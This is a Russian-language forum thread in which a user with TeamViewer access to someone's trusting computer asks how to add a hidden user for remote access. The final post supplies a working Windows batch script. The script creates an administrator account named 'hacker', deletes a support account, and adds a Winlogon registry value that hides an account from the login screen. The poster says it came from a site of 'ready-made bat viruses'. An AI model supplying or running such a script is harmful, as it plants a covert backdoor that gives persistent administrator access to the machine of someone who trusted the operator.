всем добрый день, мне нужен ваш совет или инструкция. Дело в том что у меня есть доступ к компьютеру человека через теам вивер, он мне доверяет.. Вообщем и кароче: есть ли батник который открывает удаленный рабочий стол и добовляет скрытого пользователя.. Приму любые советы, сразу скажу в гуугле не искал, в данный момент на работе на сутках... Поэтому если не трудно кому то, можете написать как сделать.. За любой хороший совет, кроме совета поищи в гуггле ) поставлю плюсики.. Вем спасибо, с уважением Сергей..
простите пожалуйста, глубоко извеняюсь... Мне очень жаль что не там написал, ни какие корыстные цели не приследовал... Переместите пожалуйста, еще раз извините..
хорошо подумай перед тем как создавать тему, еще лучше подумай перед тем как писать что не искал, если не искал единственный благоразумный совет будет "поищите ", кто ищет тот находит, а если не нашли создайте тему в разделе который соответствует и опишите проблему, тут я не вижу ни попытки найти ни целей. С уважением, Я. P.S. + - это не валюта , а благодарность за умный пост или ответ, и большинство людей на форуме относятся к ним параллельно, и помогают не поэтому, а потому что хотят или могут.
спасибо стопфреелайт, поищу.. Честно ) просто ступил что то.. З.Ы я знаю что плюсики это не валюта, поэтому я написал что за хороший ответ поставлю плюс.. Извините надобыло написать так "за хороший ответ в качестве благодарности поставлю плюс"
на счет именно удаленного стола не знаю.А вот через телнет есть,сокрытие учетки также возможно.Пример выкладывал в видео разделе,можешь посмотреть.
спасибо ДооД.. Вообще правильно сказал стопфреелайф, стоило мне сначало поискать, а потом уже лезть с просьбами... Всем спасибо, если не найду хотя врятли не найду... То спрошу уже у вас..
Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить) @echo off chcp 1251 net user SUPPORT_388945a0 /delete net user hacker hack /add net localgroup Администраторы hacker /add net localgroup Пользователи SUPPORT_388945a0 /del reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y взял отсюда __site-pro-vse.3dn.ru/publ/vsjo_o_virusakh/gotovye_bat_virusy/2-1-0-9